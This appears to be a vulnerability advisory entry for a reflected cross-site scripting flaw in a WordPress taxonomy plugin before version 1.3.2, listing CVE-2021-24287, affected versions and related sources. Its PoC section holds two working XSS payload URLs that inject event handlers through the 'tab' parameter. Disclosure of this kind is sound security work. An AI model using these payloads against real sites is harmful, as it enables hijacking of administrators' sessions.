Lucene search
WpvulndbWPVDB-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDFHistoryApr 23, 2021 - 12:00 a.m.
Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)
2021-04-2300:00:00
wpscan.com
14
0.002 Low
EPSS
Percentile
65.1%
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
PoC
https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=“+style%3D"animation-name%3Aspinner”+onanimationstart%3D"alert(%2FXSS%2F)
| CPE | Name | Operator | Version |
|---|---|---|---|
| select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons | lt | 1.3.2 |
Related
nvd
nvd
CVE-2021-24287
2021-05-14 12:15:08
nuclei
nuclei
WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting
2023-03-05 13:42:10
patchstack
patchstack
prion
prion
Cross site scripting
2021-05-14 12:15:00
zdt
zdt
cve
cve
CVE-2021-24287
2021-05-14 12:15:08
cvelist
cvelist
wpexploit
wpexploit
packetstorm
packetstorm
WordPress Select All Categories And Taxonomies 1.3.1 Cross Site Scripting
2021-09-29 00:00:00
exploitdb
exploitdb